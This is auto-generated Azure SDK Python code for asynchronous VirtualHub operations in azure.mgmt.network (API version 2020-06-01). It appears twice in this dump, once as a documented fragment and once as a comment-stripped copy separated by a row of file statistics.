body_content = self._serialize.body(virtual_hub_parameters, 'VirtualHub')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualHub', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualHub', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
virtual_hub_name: str,
virtual_hub_parameters: "_models.VirtualHub",
**kwargs
) -> AsyncLROPoller["_models.VirtualHub"]:
"""Creates a VirtualHub resource if it doesn't exist else updates the existing VirtualHub.
:param resource_group_name: The resource group name of the VirtualHub.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:param virtual_hub_parameters: Parameters supplied to create or update VirtualHub.
:type virtual_hub_parameters: ~azure.mgmt.network.v2020_06_01.models.VirtualHub
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either VirtualHub or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2020_06_01.models.VirtualHub]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualHub"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_hub_name=virtual_hub_name,
virtual_hub_parameters=virtual_hub_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualHub', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'} # type: ignore
async def update_tags(
self,
resource_group_name: str,
virtual_hub_name: str,
virtual_hub_parameters: "_models.TagsObject",
**kwargs
) -> "_models.VirtualHub":
"""Updates VirtualHub tags.
:param resource_group_name: The resource group name of the VirtualHub.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:param virtual_hub_parameters: Parameters supplied to update VirtualHub tags.
:type virtual_hub_parameters: ~azure.mgmt.network.v2020_06_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualHub, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_06_01.models.VirtualHub
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualHub"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_tags.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(virtual_hub_parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualHub', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
virtual_hub_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
virtual_hub_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Deletes a VirtualHub.
:param resource_group_name: The resource group name of the VirtualHub.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
virtual_hub_name=virtual_hub_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.ListVirtualHubsResult"]:
"""Lists all the VirtualHubs in a resource group.
:param resource_group_name: The resource group name of the VirtualHub.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListVirtualHubsResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_06_01.models.ListVirtualHubsResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListVirtualHubsResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ListVirtualHubsResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs'} # type: ignore
def list(
self,
**kwargs
) -> AsyncIterable["_models.ListVirtualHubsResult"]:
"""Lists all the VirtualHubs in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListVirtualHubsResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_06_01.models.ListVirtualHubsResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListVirtualHubsResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ListVirtualHubsResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/virtualHubs'} # type: ignore
async def _get_effective_virtual_hub_routes_initial(
self,
resource_group_name: str,
virtual_hub_name: str,
effective_routes_parameters: Optional["_models.EffectiveRoutesParameters"] = None,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._get_effective_virtual_hub_routes_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if effective_routes_parameters is not None:
body_content = self._serialize.body(effective_routes_parameters, 'EffectiveRoutesParameters')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_get_effective_virtual_hub_routes_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/effectiveRoutes'} # type: ignore
async def begin_get_effective_virtual_hub_routes(
self,
resource_group_name: str,
virtual_hub_name: str,
effective_routes_parameters: Optional["_models.EffectiveRoutesParameters"] = None,
**kwargs
) -> AsyncLROPoller[None]:
"""Gets the effective routes configured for the Virtual Hub resource or the specified resource .
:param resource_group_name: The resource group name of the VirtualHub.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:param effective_routes_parameters: Parameters supplied to get the effective routes for a
specific resource.
:type effective_routes_parameters: ~azure.mgmt.network.v2020_06_01.models.EffectiveRoutesParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._get_effective_virtual_hub_routes_initial(
resource_group_name=resource_group_name,
virtual_hub_name=virtual_hub_name,
effective_routes_parameters=effective_routes_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_get_effective_virtual_hub_routes.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/effectiveRoutes'} # type: ignore
| 49.944193 | 223 | 0.671156 |
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VirtualHubsOperations:
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get(
self,
resource_group_name: str,
virtual_hub_name: str,
**kwargs
) -> "_models.VirtualHub":
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
url = self.get.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualHub', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'}
async def _create_or_update_initial(
self,
resource_group_name: str,
virtual_hub_name: str,
virtual_hub_parameters: "_models.VirtualHub",
**kwargs
) -> "_models.VirtualHub":
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
url = self._create_or_update_initial.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
header_parameters = {}
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {}
body_content = self._serialize.body(virtual_hub_parameters, 'VirtualHub')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualHub', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualHub', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'}
async def begin_create_or_update(
self,
resource_group_name: str,
virtual_hub_name: str,
virtual_hub_parameters: "_models.VirtualHub",
**kwargs
) -> AsyncLROPoller["_models.VirtualHub"]:
polling = kwargs.pop('polling', True)
cls = kwargs.pop('cls', None)
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None)
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_hub_name=virtual_hub_name,
virtual_hub_parameters=virtual_hub_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualHub', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'}
async def update_tags(
self,
resource_group_name: str,
virtual_hub_name: str,
virtual_hub_parameters: "_models.TagsObject",
**kwargs
) -> "_models.VirtualHub":
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
url = self.update_tags.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
header_parameters = {}
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {}
body_content = self._serialize.body(virtual_hub_parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualHub', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'}
async def _delete_initial(
self,
resource_group_name: str,
virtual_hub_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
url = self._delete_initial.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'}
async def begin_delete(
self,
resource_group_name: str,
virtual_hub_name: str,
**kwargs
) -> AsyncLROPoller[None]:
polling = kwargs.pop('polling', True)
cls = kwargs.pop('cls', None)
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None)
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
virtual_hub_name=virtual_hub_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'}
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.ListVirtualHubsResult"]:
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
def prepare_request(next_link=None):
header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
url = self.list_by_resource_group.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {}
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ListVirtualHubsResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
